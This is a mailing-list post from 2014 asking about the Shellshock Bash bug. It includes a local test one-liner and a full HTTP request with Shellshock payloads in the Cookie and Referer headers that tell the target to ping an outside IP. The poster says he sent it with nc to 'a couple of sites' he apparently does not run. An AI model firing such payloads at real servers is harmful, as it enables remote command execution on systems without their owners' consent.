Hi everyone,

Happy new year! To make it even merrier, it seems like a rather widespread vulnerability, based upon a bug in Bash (!), has been discovered:

http://www.engadget.com/2014/09/25/what-is-the-shellshock/

Or for short, type this on your bash console and see if you're cooked:

env x='() { :;}; echo vulnerable' bash -c 'echo This is a test'

If it says "vulnerable" before "This is a test", welcome to the club. Odds are it will.

So the idea is that you can execute an arbitrary command on a remote computer, if you can add an environment variable, and kick off a bash shell with it.

Word has it that, since the HTTP headers are passed to any CGI script as environment variables (by Apache, for example), it's possible to use the Referer or Cookie headers for this purpose.

So I tried this on a couple of sites (addresses mangled):

GET / HTTP/1.1
Host: thesite.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: () { :; }; ping -c 3 93.1.9.2
Referer: () { :; }; ping -c 3 93.1.9.2

and then went

nc thesite.com 80 < therequest.txt

This was supposed to trigger a ping in my direction, but it didn't. Instead, I found the full Referer string in the access log. Apparently, it didn't work on my first go.

Insights, anyone? Does it mean that the tested site is safe, despite the horror stories?

Regards,
   Eli

--
Web: http://www.billauer.co.il

_______________________________________________
Haifux mailing list
Haifux@haifux.org
http://haifux.org/mailman/listinfo/haifux
